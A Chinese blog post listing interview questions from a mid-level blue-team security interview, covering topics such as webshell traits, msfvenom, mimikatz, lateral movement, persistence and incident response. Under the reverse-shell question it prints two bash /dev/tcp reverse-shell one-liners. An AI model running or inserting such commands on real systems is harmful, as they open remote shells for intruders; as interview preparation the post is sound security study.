前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【面试】记一次HVV蓝队中级(面试题)

【面试】记一次HVV蓝队中级(面试题)

作者头像
没事就要多学习
发布2024-07-18 15:37:54
650
发布2024-07-18 15:37:54
举报
文章被收录于专栏:Cyber Security
使用过安全设备吗?使用过程中发现过真实攻击行为吗?

SRC经验

网络攻防CTF经历

Web OWasp Top10

常见webshell特征(内存马特征)

Goby在用什么版本?(这是没想到的)

Sqlmap参数

Burpsuite常用插件

MSF生成木马命令行(msfvenom 这问题也是我没想到的)

动态免杀(这里要补一下了,不太熟悉)

mimikaze使用

CS插件使用过那些

Linux系统弹shell命令(bash命令)

代码语言:javascript
复制
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1

横向移动思路

应急响应了解吗(流程,想法,思路)

一台机器装不了杀软,怎么进行排查?(手动排查)

自己打的内网靶场多吗?

权限维持思路?

金银票据区别?

自己写过的EXP多吗,使用那些库?

钓鱼邮件(构造思路以及分析思路)

反制思路

总结

动态免杀方面需要补一下、应急响应方面知识没有构成系统,讲的有点乱

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 使用过安全设备吗?使用过程中发现过真实攻击行为吗?
  • SRC经验
  • 网络攻防CTF经历
  • Web OWasp Top10
  • 常见webshell特征(内存马特征)
  • Goby在用什么版本?(这是没想到的)
  • Sqlmap参数
  • Burpsuite常用插件
  • MSF生成木马命令行(msfvenom 这问题也是我没想到的)
  • 动态免杀(这里要补一下了,不太熟悉)
  • mimikaze使用
  • CS插件使用过那些
  • Linux系统弹shell命令(bash命令)
  • 横向移动思路
  • 应急响应了解吗(流程,想法,思路)
  • 一台机器装不了杀软,怎么进行排查?(手动排查)
  • 自己打的内网靶场多吗?
  • 权限维持思路?
  • 金银票据区别?
  • 自己写过的EXP多吗,使用那些库?
  • 钓鱼邮件(构造思路以及分析思路)
  • 反制思路
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档